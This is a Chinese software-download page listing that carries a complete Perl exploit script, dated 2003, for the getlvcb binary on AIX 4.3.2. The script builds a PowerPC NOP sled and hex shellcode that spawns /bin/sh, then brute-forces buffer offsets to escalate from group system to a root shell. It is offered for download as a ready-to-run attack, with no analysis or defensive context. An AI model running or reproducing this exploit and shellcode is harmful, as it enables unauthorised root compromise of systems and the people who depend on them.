|
|
|
| x_getlvcb_aix432_limited.pl |
|
| 运行环境: Win9x/NT/2000/XP/2003 |
 |
文件大小: 0 K |
| 软件等级: ★★★ |
软件类别: 国产软件 |
| 开 发 商: 未知 |
软件语言: 英文 |
| 相关链接: 软件演示地址 软件注册地址 |
软件属性: 热 |
下载次数: 本日: 本周:
本月: 总计: |
授权方式: 免费版 |
| 解压密码: |
| 软件添加: 审核:admin 录入:admin |
添加时间: 2006-9-24 0:51:37 |
|
 |
#!/usr/bin/perl
# FileName: x_getlvcb_aix432_limited.pl
# Exploit getlvcb of Aix4.3.2 to get a uid=0 shell from gid=system.
# Tested : on Aix4.3.2.
# Author : watercloud@xfocus.org
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-5-30
# Announce: use as your owner risk!
# Thanks Anthony Roe point out the bug not affect Aix4.3.3.
$CMD="/usr/sbin/getlvcb";
$_=`/usr/bin/oslevel`;
$XID="\x03";
$UID="\x97";
print "\n\nExploit $CMD for Aix 4.3.2 to get uid=0 shell.\n";
print "From: [ www.xfocus.org 2003-5-30 ].\n\n";
print "Note :\n";
print "You must get gid=0 befor use this exploit.";
print "If you get a shell euid=0 then run this command: ";
print "/usr/bin/syscall setreuid 0 0 \\; execve '/bin/sh'\n";
$NOP="\x7c\xa5\x2a\x79"x800;
%ENV=();
$ENV{CCC}="AA".$NOP.&getshell($XID,$UID);
$ret=system $CMD ,"AAA"."\x2f\xf2\x2b\x40"x300;
for($i=0;$i<4 && $ret;$i++){
for($j=0;$j<4 && $ret;$j++) {
$ENV{CCC}="A"x $i .$NOP.&getshell($XID,$UID);
$ret = system $CMD ,"A"x $j ."\x2f\xf2\x2b\x40"x300;
}
}
#sub
sub getshell($XID,$GID) {
my $SHELL,($XID,$GID)=@_;
$SHELL="\x7e\x94\xa2\x79\x7e\x84\xa3\x78\x40\x82\xff\xfd";
$SHELL.="\x7e\xa8\x02\xa6\x3a\xb5\x01\x40\x88\x55\xfe\xe0";
$SHELL.="\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6";
$SHELL.="\x4c\xc6\x33\x42\x44\xff\xff\x02$GID$XID\xff\xff";
$SHELL.="\x38\x75\xff\x04\x38\x95\xff\x0c\x7e\x85\xa3\x78";
$SHELL.="\x90\x75\xff\x0c\x92\x95\xff\x10\x88\x55\xfe\xe1";
$SHELL.="\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh\xff";
return $SHELL;
}
#EOF
|
|
|
